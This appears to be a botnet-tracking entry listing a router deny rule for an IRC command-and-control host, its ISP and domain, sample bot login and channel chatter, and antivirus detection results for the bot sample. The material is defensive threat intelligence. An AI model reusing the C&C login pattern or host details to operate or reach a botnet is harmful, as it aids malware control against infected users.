Filter deny ip host 203.146.251.62 any log ! 1 infects 11/03/09 to 11/03/09 csloxinfo.net |
ISP reassign to paidc idc suapha-idc customer |
| Clients 1 |
 thailand |
Activity |
Domain csloxinfo.net |
Chatter Example
- Client: PASS secretpass
- Client: NICK P|ot4z09bbzUSER lnv4ddgy3 * 0 :USA|XP|651
- Server: :hub.62014.net 001 P|ot4z09bbz...
- Client: USERHOST P|ot4z09bbz
- Server: :hub.62014.net 302 P|ot4z09bbz...
- Client: USERHOST P|ot4z09bbzMODE P|ot4z09bbz JOIN #mm RSA
- Client: PRIVMSG #mm...
more.... |
BotClient Antivirus Diagnoses
| AhnLab-V3 | MISSED |
| AntiVir | TRDropper.Gen |
| Authentium | Threat-HLLIYE!Eldorado |
| Avast | _DCom-F |
| AVG | Heur |
| BitDefender | Packer.Yoda.A |
| CAT-QuickHeal | MISSED |
| ClamAV | MISSED |
| DrWeb | HLLW.Piabot.4 |
| eSafe | MISSED |
| eTrust-Vet | MISSED |
| Ewido | MISSED |
| FileAdvisor | MISSED |
| Fortinet | MISSED |
| F-Prot | Threat-HLLIYE!Eldorado |
| F-Secure | MISSED |
| Ikarus | Exploit.MS06040 |
| Kaspersky | Heur.Generic |
| McAfee | MISSED |
| Microsoft | Exploit_MS06040.gen |
| NOD32v2 | MISSED |
| Norman | MISSED |
| Panda | TrjCI.A |
| Prevx1 | MISSED |
| Rising | MISSED |
| Sophos | MalPacker |
| Sunbelt | MISSED |
| Symantec | MISSED |
| TheHacker | MISSED |
| TrendMicro | PAK_Generic.001 |
| VBA32 | MISSED |
| VirusBuster | PackedYoda |
Webwasher
Gateway | MISSED |
| |
|
